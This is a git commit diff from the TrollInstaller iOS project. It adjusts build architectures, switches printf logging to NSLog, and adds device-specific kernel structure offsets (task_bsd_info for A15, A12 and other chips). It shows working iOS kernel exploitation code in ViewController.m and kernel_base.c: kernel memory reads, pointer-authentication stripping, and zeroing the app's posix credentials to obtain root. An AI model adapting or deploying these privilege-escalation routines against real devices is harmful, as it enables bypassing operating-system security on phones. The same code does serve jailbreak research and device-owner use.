Hopefully fix TrollInstaller not working on non-A15 devices (quietly updated release so redownload IPA)

2022-09-02 21:55:39 +02:00 · 2022-09-02 21:55:39 +02:00 · e4afe70414
parent c118d1eb33
commit e4afe70414
3 changed files with 51 additions and 5 deletions
--- a/Installer/TrollInstaller/TrollInstaller.xcodeproj/project.pbxproj
+++ b/Installer/TrollInstaller/TrollInstaller.xcodeproj/project.pbxproj
@ -388,6 +388,10 @@
 		8CE2BD3A28AD5D730058FBAD /* Debug */ = {
 			isa = XCBuildConfiguration;
 			buildSettings = {
 				ARCHS = (
 					arm64e,
 					arm64,
 				);
 				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
 				ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
 				CODE_SIGN_STYLE = Automatic;
@ -421,6 +425,10 @@
 		8CE2BD3B28AD5D730058FBAD /* Release */ = {
 			isa = XCBuildConfiguration;
 			buildSettings = {
 				ARCHS = (
 					arm64e,
 					arm64,
 				);
 				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
 				ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
 				CODE_SIGN_STYLE = Automatic;
--- a/Installer/TrollInstaller/TrollInstaller/ViewController.m
+++ b/Installer/TrollInstaller/TrollInstaller/ViewController.m
@ -16,6 +16,17 @@
 extern uint64_t g_self_proc;
 void badLog(const char* a, ...)
 {
    va_list va;
    va_start(va, a);
    NSString* af = [NSString stringWithUTF8String:a];
    NSString* msg = [[NSString alloc] initWithFormat:af arguments:va];
    va_end(va);
    NSLog(@"%@",msg);
    return;
 }
 int runBinary(NSString* path, NSArray* args)
 {
    NSMutableArray* argsM = args.mutableCopy;
@ -63,7 +74,7 @@ gid_t backup_groupList[200];
 int getRoot(void)
 {
-    printf("attempting to get root...\n");
+    NSLog(@"attempting to get root...\n");
    usleep(1000);
    backup_groupSize = getgroups(200, &backup_groupList[0]);
@ -71,19 +82,19 @@ int getRoot(void)
    backup_cred = proc_get_posix_cred(g_self_proc);
    struct k_posix_cred zero_cred = {0};
-    printf("setting posix cred to zero cred...\n");
+    NSLog(@"setting posix cred to zero cred...\n");
    usleep(1000);
    proc_set_posix_cred(g_self_proc, zero_cred);
    int err = setgroups(0,0);
    if(err)
    {
-        printf("setgroups error %d\n", err);
+        NSLog(@"setgroups error %d\n", err);
        usleep(1000);
    }
    int uid = getuid();
-    printf("getuid => %d\n", uid);
+    NSLog(@"getuid => %d\n", uid);
    usleep(1000);
    return uid;
@ -135,6 +146,9 @@ int writeRemountPrivatePreboot(void)
 - (void)doInstallation
 {
    NSLog(@"TrollStore out here, exploitation starting!");
    usleep(1000);
    [self updateStatus:@"Exploiting..."];
    // Run Kernel exploit
@ -151,6 +165,9 @@ int writeRemountPrivatePreboot(void)
    km.kwrite_64 = kwrite64;
    km.kcleanup = exploitation_cleanup;
    NSLog(@"Exploitation finished, post exploit stuff next!");
    usleep(1000);
    [self updateStatus:@"Getting root..."];
    // Get root
--- a/Installer/TrollInstaller/TrollInstaller/exploit/kernel_base.c
+++ b/Installer/TrollInstaller/TrollInstaller/exploit/kernel_base.c
@ -9,6 +9,9 @@
 #include <stdint.h>
 #include <sys/socket.h>
 #include <sys/syscall.h>
 #include <sys/utsname.h>
 extern void badLog(const char*, ...);
 uint64_t g_self_proc = 0;
@ -46,7 +49,25 @@ uint64_t kernel_base_from_holder(mach_port_t holder, uint64_t holder_addr)
    uint64_t x68 = xpaci(kread64(kmsg + 0x68));
    uint64_t self_ipc_space = xpaci(kread64(x68 + 0x50));
    uint64_t self_task = xpaci(kread64(self_ipc_space + 0x30));
-    g_self_proc = xpaci(kread64(self_task + 0x3c8));
+
    struct utsname u;
    uname(&u);
    uint64_t off_task_bsd_info;
 #if __arm64e__
    if (strstr(u.machine, "iPhone14,"))
    {
        off_task_bsd_info = 0x3c8;  //  ios15.1    a15       // proc_t::task_bsd_info
    }
    else
    {
        off_task_bsd_info = 0x3b8;  //; iOS15.1    a12         // proc_t::task_bsd_info
    }
 #else
    off_task_bsd_info = 0x3A0;
 #endif
    g_self_proc = xpaci(kread64(self_task + off_task_bsd_info));
    // find kernel base
    uint64_t pos = (fops & ~0x3FFF);